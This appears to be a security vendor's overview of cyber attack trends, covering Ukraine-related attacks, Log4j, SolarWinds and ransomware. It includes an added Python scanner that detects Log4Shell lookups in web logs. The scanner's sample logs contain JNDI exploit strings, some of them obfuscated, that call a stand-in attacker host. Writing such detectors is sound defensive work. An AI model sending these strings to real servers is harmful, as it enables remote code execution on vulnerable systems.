A cyber attack is an assault launched by cybercriminals using one or more computers against a single or multiple computers or networks. A cyber attack can maliciously disable computers, steal data, or use a breached computer as a launch point for other attacks. Cybercriminals use a variety of methods to launch a cyber attack, including malware, phishing, ransomware, denial of service, among other methods.
Check Point Research (CPR) has released information on cyber attacks that have been seen in the context of the ongoing Russia-Ukraine conflict. In the first three days of battle, cyber attacks on Ukraine’s government and military sector increased by an astounding 196%. The number of cyber attacks on Russian businesses has climbed by 4%.
Phishing emails in East Slavic languages grew sevenfold, with a third of those malicious phishing emails being sent from Ukrainian email addresses to Russian receivers.
A severe remote code execution (RCE) vulnerability in the Apache logging package Log4j 2, affecting versions 2.14.1 and below, was reported on December 9th, 2021 (CVE-2021-44228). With over 400,000 downloads from its GitHub repository, Apache Log4j is the most popular Java logging package. It is used by a large number of enterprises throughout the world and provides logging for a variety of popular applications. The flaw is easy to exploit, and it allows threat actors to take control of Java-based web servers and perform remote code execution attacks.
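Because the flaw is triggered by data that an application merely logs, one practical detection for defenders is to scan existing web-server logs for the lookup strings that CVE-2021-44228 exploitation attempts carry. The following Python scanner is an added example, not code from the page or from Check Point. It assumes the documented behaviour of that CVE (Log4j 2 resolving `${jndi:...}` lookups embedded in logged strings) and handles the nested-lookup obfuscations that defeat a naive substring match. All log lines, client addresses and hostnames (reserved `.invalid` domain) are constructed for the example.

```python
import re

# Constructed sample access-log lines (not from the page). Lines 2-4 carry the kind
# of lookup strings seen in CVE-2021-44228 exploitation attempts, in the User-Agent
# or query string; lines 1 and 5 are benign. Hosts use the reserved .invalid TLD.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:08:01:13 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:08:01:20 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:08:01:21 +0000] "GET /?x=${${lower:j}ndi:rmi://attacker.invalid/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:08:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.invalid/c}"',
    '10.0.0.7 - - [10/Dec/2021:08:02:00 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0 (X11; Linux)"',
]

# Nested lookups that resolve to a single literal: ${lower:j} / ${upper:J}.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# Lookups that fall back to a default value: ${::-j} or ${env:NOPE:-j} both yield "j".
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The pattern that matters after normalization; group 1 is the URI scheme.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize(text: str) -> str:
    """Collapse obfuscating inner lookups, innermost first, until the string is stable."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), text)
        text = _DEFAULT_LOOKUP.sub(r"\1", text)
    return text


def scan_log_lines(lines):
    """Return one finding per line containing a JNDI lookup, with its scheme and
    whether obfuscation had to be stripped to see it."""
    findings = []
    for lineno, raw in enumerate(lines, start=1):
        normalized = normalize(raw)
        match = _JNDI.search(normalized)
        if match:
            findings.append({
                "line": lineno,
                "scheme": match.group(1).lower(),
                "obfuscated": normalized != raw,
            })
    return findings


if __name__ == "__main__":
    for hit in scan_log_lines(SAMPLE_LOGS):
        flag = " (obfuscated)" if hit["obfuscated"] else ""
        print(f"line {hit['line']}: JNDI lookup via {hit['scheme']}{flag}")
```

Run against the constructed sample, the scanner reports lines 2, 3 and 4 with schemes `ldap`, `rmi` and `dns`, and marks the last two as obfuscated. A hit in a log is evidence of an attempt, not of success; the remediation the page points to is upgrading any Log4j 2 deployment at version 2.14.1 or below.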
The world is now facing what seems to be a 5th generation cyber-attack – a sophisticated, multi-vector attack with clear characteristics of the cyber pandemic. The attack, named Sunburst by researchers, is in our view one of the most sophisticated and severe attacks ever seen. It has been reported to impact major US government offices as well as many private sector organizations.
This series of attacks was made possible when hackers were able to embed a backdoor into SolarWinds software updates. Over 18,000 companies and government offices downloaded what seemed to be a regular software update onto their computers, but was actually a Trojan horse. By leveraging the common IT practice of installing software updates, the attackers used the backdoor to compromise each organization’s assets, enabling them to spy on the organization and access its data. For more information visit our Sunburst attack hub.
The resurgence of ransomware has been growing. Small local and state government agencies, mainly in the southeastern part of the U.S., have been victimized. Digital transformation is eroding traditional network perimeters with the adoption of cloud computing, cloud-based subscription services, and the ubiquity of mobile devices. This increased expansion of vectors means more ways to attack an organization.
In Q3 2020, Check Point Research saw a 50% increase in the daily average of ransomware attacks compared to the first half of the year. Organizations worldwide were under a massive wave of ransomware attacks, with healthcare as the most targeted industry.
As these attacks continue to mature both in frequency and intensity, their impact on business has grown exponentially. The top ransomware types were Maze and Ryuk.
Cyber threats of generation V and VI are now a reality for businesses. Cybercriminals are aware of recent advancements in company cybersecurity and have adapted their attacks to circumvent and defeat traditional safeguards. To avoid detection, modern cyber attacks are multi-vectored and use polymorphic code. As a result, detecting and responding to threats is more challenging than ever.
Cybercriminals’ primary target and an organization’s first line of defense in the remote work world is the endpoint. Securing the remote workforce necessitates an understanding of the most common cyber risks that employees experience, as well as endpoint security solutions capable of detecting, preventing, and resolving these assaults.
Cyberattacks come in a variety of different forms. Cybercriminals use many different methods to gain initial access, such as a phishing attack, exploitation of compromised credentials, and more. From this initial access, cybercriminals can go on to achieve different objectives including malware infections, ransomware, denial of service attacks, data theft, and more.
Cyberattack trends change rapidly, and Check Point’s 2022 mid-year report examines the latest evolution of the cyber threat landscape.
In February 2022, Russia launched an invasion of Ukraine. This conflict used a variety of tactics, including attacks via land, sea, air, and cyberspace. Russia has a history of engaging in cyberattacks against Ukraine, including DDoS attacks and attacks against the country’s power infrastructure in 2015 and 2022.
With the invasion, cyberattacks — both official and unofficial — grew more common. On both sides of the conflict, volunteer troops launched various attacks against both military and civilian targets. Additionally, Russian APTs launched coordinated attacks to disrupt critical services within Ukraine. On the Ukrainian side, government representatives have officially requested and endorsed help with protecting the country’s critical infrastructure and launching attacks against Russian targets. While state-sponsored APTs have historically launched politically motivated attacks, this conflict led to the engagement of cybercriminals and individuals in cyberattacks as well.
Ransomware attacks have consistently grown to take on larger targets. Ransomware attacks began targeting individuals and moved to focus on large enterprises and organizations that can pay large ransoms. Recently, cyber threat actors have begun targeting entire countries with their attacks.
As these ransomware groups grow larger and more visible, they are increasingly linked to nation-states. Large-scale organizations launching attacks against countries are difficult to hide from governments, so cybercrime groups like Conti are increasingly aligning themselves politically with nation-states to continue operating. As the United States and other jurisdictions step up law enforcement against cybercrime, some countries cooperate only selectively, protecting cybercrime groups whose activities coincide with their political interests.
Supply chain attacks have become a top-of-mind security threat in recent years. Attacks such as those on SolarWinds and Kaseya brought them to prominence, and open-source software supply chain attacks pose a significant risk to organizations today.
However, the near-universal adoption of cloud infrastructure, together with the challenges that companies face in securing their cloud environments, makes cloud supply chain attacks a significant risk in the near future. Attacks against third-party providers enable an attacker to dramatically scale and increase the effects of their attacks, as demonstrated by the alleged March 2022 attack on Okta. Similar attacks against a cloud provider such as AWS or Azure would have a much more significant impact.
As companies become more reliant on mobile communication, cyberattacks increasingly target mobile devices. While the NSO Group’s Pegasus is the most famous threat to mobile devices, it is far from the only mobile malware. New mobile surveillance malware created by Cytrox and QuaDream has begun using the same techniques and providing the same capabilities as Pegasus. These three spyware variants have also begun using new vulnerabilities and exploits to evade new protections on iPhones.
In addition to spyware, sophisticated mobile malware such as Flubot and Malibot have begun building mobile device botnets using smishing and similar techniques. Cyber threat actors are also targeting official app stores with malware that masquerades as an antivirus, productivity tool, or other desirable application – and delivers infostealers, banking trojans, and other mobile malware.
Despite the prevalence of cyber attacks, Check Point data suggests that 99 percent of enterprises are not effectively protected. However, a cyber attack is preventable. The key to cyber defense is an end-to-end cyber security architecture that is multilayered and spans all networks, endpoint and mobile devices, and cloud. With the right architecture, you can consolidate management of multiple security layers and control policy through a single pane of glass. This lets you correlate events across all network environments, cloud services, and mobile infrastructures.
In addition to architecture, Check Point recommends these key measures to prevent cyber attacks:
Learn more about recent cyber attack trends by checking out Check Point’s 2021 Mid-Year Cyber Security Report. You’re also welcome to learn how to protect against modern cyber threats by signing up for a free demo of Check Point Harmony Endpoint.